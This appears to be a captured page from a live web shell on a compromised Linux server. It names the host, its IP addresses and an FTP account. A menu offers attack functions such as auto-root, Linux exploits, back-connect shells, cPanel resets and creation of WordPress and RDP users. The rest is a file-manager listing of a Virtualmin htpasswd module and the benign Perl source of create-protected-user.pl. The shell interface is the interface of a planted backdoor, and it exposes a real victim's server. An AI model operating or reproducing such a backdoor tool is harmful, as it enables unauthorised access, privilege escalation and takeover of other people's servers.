Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
virtualmin-htpasswd /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
404
B
-rw-r--r--
LICENSE
34.32
KB
-rw-r--r--
add.cgi
3.14
KB
-rwxr-xr-x
add_form.cgi
1.52
KB
-rwxr-xr-x
cgi_args.pl
279
B
-rwxr-xr-x
create-protected-directory.pl
4.78
KB
-rwxr-xr-x
create-protected-user.pl
3.63
KB
-rwxr-xr-x
delete-protected-directory.pl
3.35
KB
-rwxr-xr-x
delete-protected-user.pl
2.64
KB
-rwxr-xr-x
delete.cgi
1.82
KB
-rwxr-xr-x
find.cgi
1.79
KB
-rwxr-xr-x
index.cgi
2.42
KB
-rwxr-xr-x
install-type
4
B
-rw-r--r--
list-protected-directories.pl
3.01
KB
-rwxr-xr-x
list-protected-users.pl
2.99
KB
-rwxr-xr-x
module.info
147
B
-rw-r--r--
module.info.af.auto
34
B
-rw-r--r--
module.info.ar.auto
49
B
-rw-r--r--
module.info.be.auto
41
B
-rw-r--r--
module.info.bg.auto
65
B
-rw-r--r--
module.info.ca.auto
44
B
-rw-r--r--
module.info.cs.auto
42
B
-rw-r--r--
module.info.da.auto
40
B
-rw-r--r--
module.info.de.auto
45
B
-rw-r--r--
module.info.el.auto
79
B
-rw-r--r--
module.info.es.auto
45
B
-rw-r--r--
module.info.eu.auto
43
B
-rw-r--r--
module.info.fa.auto
58
B
-rw-r--r--
module.info.fi
40
B
-rw-r--r--
module.info.fr.auto
47
B
-rw-r--r--
module.info.he.auto
45
B
-rw-r--r--
module.info.hr.auto
41
B
-rw-r--r--
module.info.hu.auto
40
B
-rw-r--r--
module.info.it.auto
41
B
-rw-r--r--
module.info.ja.auto
43
B
-rw-r--r--
module.info.ko.auto
39
B
-rw-r--r--
module.info.lt.auto
45
B
-rw-r--r--
module.info.lv.auto
41
B
-rw-r--r--
module.info.ms.auto
40
B
-rw-r--r--
module.info.mt.auto
43
B
-rw-r--r--
module.info.nl
42
B
-rw-r--r--
module.info.no
40
B
-rw-r--r--
module.info.pl.auto
39
B
-rw-r--r--
module.info.pt.auto
45
B
-rw-r--r--
module.info.pt_BR.auto
48
B
-rw-r--r--
module.info.ro.auto
40
B
-rw-r--r--
module.info.ru.auto
57
B
-rw-r--r--
module.info.sk.auto
40
B
-rw-r--r--
module.info.sl.auto
41
B
-rw-r--r--
module.info.sv.auto
38
B
-rw-r--r--
module.info.th.auto
111
B
-rw-r--r--
module.info.tr.auto
38
B
-rw-r--r--
module.info.uk.auto
63
B
-rw-r--r--
module.info.ur.auto
72
B
-rw-r--r--
module.info.vi.auto
41
B
-rw-r--r--
module.info.zh.auto
37
B
-rw-r--r--
module.info.zh_TW.auto
40
B
-rw-r--r--
virtual_feature.pl
7.38
KB
-rwxr-xr-x
virtualmin-htpasswd-lib.pl
2.03
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : create-protected-user.pl
#!/usr/bin/perl use strict; use warnings; our $module_name; =head1 create-protected-user.pl Add a user to some protected directory. This command adds a user to a protected directory, identified by the C<--domain> and C<--path> flags. The login for the new user must be set with C<--user>, and the initial password with the C<--pass> flag (or C<--encpass> if you have a pre-hashed password in the right format). To create a user that is initially blocked from logging in, use the C<--disabled> flag. =cut package virtualmin_htpasswd; if (!$module_name) { no warnings "once"; $main::no_acl_check++; use warnings "once"; $ENV{'WEBMIN_CONFIG'} ||= "/etc/webmin"; $ENV{'WEBMIN_VAR'} ||= "/var/webmin"; my $pwd; if ($0 =~ /^(.*)\/[^\/]+$/) { chdir($pwd = $1); } else { chop($pwd = `pwd`); } $0 = "$pwd/created-protected-user.pl"; require './virtualmin-htpasswd-lib.pl'; $< == 0 || die "create-protected-user must be run as root"; } my @OLDARGV = @ARGV; # Parse command-line args my ($dname, $path, $user, $pass, $encpass); my $enabled = 1; while(@ARGV > 0) { my $a = shift(@ARGV); if ($a eq "--domain") { $dname = shift(@ARGV); } elsif ($a eq "--path") { $path = shift(@ARGV); } elsif ($a eq "--user") { $user = shift(@ARGV); } elsif ($a eq "--pass") { $pass = shift(@ARGV); } elsif ($a eq "--encpass") { $encpass = shift(@ARGV); } elsif ($a eq "--enabled") { $enabled = 1; } elsif ($a eq "--disabled") { $enabled = 0; } else { &usage(); } } # Validate parameters $dname || &usage("Missing --domain parameter"); $path || &usage("Missing --directory parameter"); my $d = &virtual_server::get_domain_by("dom", $dname); $d || &usage("No domain named $dname found"); $user || &usage("Missing --user parameter"); $pass || $encpass || &usage("Missing --pass or --encpass parameter"); # Get the directories for this domain my @dirs = &htaccess_htpasswd::list_directories(); @dirs = grep { &can_directory($_->[0], $d) } @dirs; my ($dir) = grep { $_->[0] eq $path || &remove_public_html($_->[0], $d) eq $path } @dirs; $dir || &usage("Directory $path is not registered"); # Get the current users for the dir and check for a clash my $users = $dir->[2] == 3 ? &htaccess_htpasswd::list_digest_users($dir->[1]) : &htaccess_htpasswd::list_users($dir->[1]); my ($clash) = grep { $_->{'user'} eq $user } @$users; $clash && &usage("A user named $user already exists"); # Add a new user object my $suser = { 'user' => $user, 'dom' => $d->{'dom'}, 'enabled' => $enabled }; if ($encpass) { $suser->{'pass'} = $encpass; } else { $suser->{'pass'} = &htaccess_htpasswd::encrypt_password( $pass, undef, $dir->[2]); } &virtual_server::write_as_domain_user($d, sub { &htaccess_htpasswd::create_user($suser, $dir->[1]) }); print "Created $suser->{'user'} in $dir->[1]\n"; sub usage { print "$_[0]\n\n" if ($_[0]); print "Add a user to some protected directory.\n"; print "\n"; print "virtualmin create-protected-user --domain name\n"; print " --path directory\n"; print " --user username\n"; print " [--pass password | --encpass hash]\n"; print " [--enabled | --disabled]\n"; exit(1); }
Close